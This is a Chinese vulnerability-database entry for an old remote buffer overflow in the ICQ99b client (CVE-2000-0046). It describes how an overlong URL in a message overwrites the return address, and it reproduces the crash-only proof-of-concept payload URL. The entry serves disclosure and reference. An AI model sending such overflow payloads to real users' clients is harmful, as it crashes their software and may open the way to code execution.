ICQ URL远程缓冲区溢出漏洞-安全小百科

ICQ URL远程缓冲区溢出漏洞

漏洞ID	1105718	漏洞类型	缓冲区溢出
发布时间	2000-01-12	更新时间	2005-10-20
CVE编号	CVE-2000-0046	CNNVD-ID	CNNVD-200001-028
漏洞平台	Windows	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/19724
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-028

|漏洞详情

ICQ99b1.1.1.1版本的客户端存在缓冲区溢出漏洞。远程攻击者可以借助ICQ消息中一个畸形的URL执行命令。

|漏洞EXP

source: http://www.securityfocus.com/bid/929/info

ICQ is an individual to individual chat network which has clients installed on millions of computers around the world. It is, by far, the most widely used and is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses an url recieved from another user _inside of a message_, it does not perform bounds checking on the length of the url. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the url is clicked on. 

Sending the following URL (with no line breaks) in a regular message to a user will cause their ICQ to crash (just a basic proof of concept, no real malicious exploit code included here) if they click on it:

http://www.yahoo.com/sites.asp?^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã!!!!Â·P !^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã

|参考资料

来源:BID
名称:929
链接:http://www.securityfocus.com/bid/929

相关推荐: NT Login Default Folder Vulnerability

NT Login Default Folder Vulnerability 漏洞ID 1104634 漏洞类型 Design Error 发布时间 1999-06-28 更新时间 1999-06-28 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N…

文章版权归作者所有，未经允许请勿转载。

THE END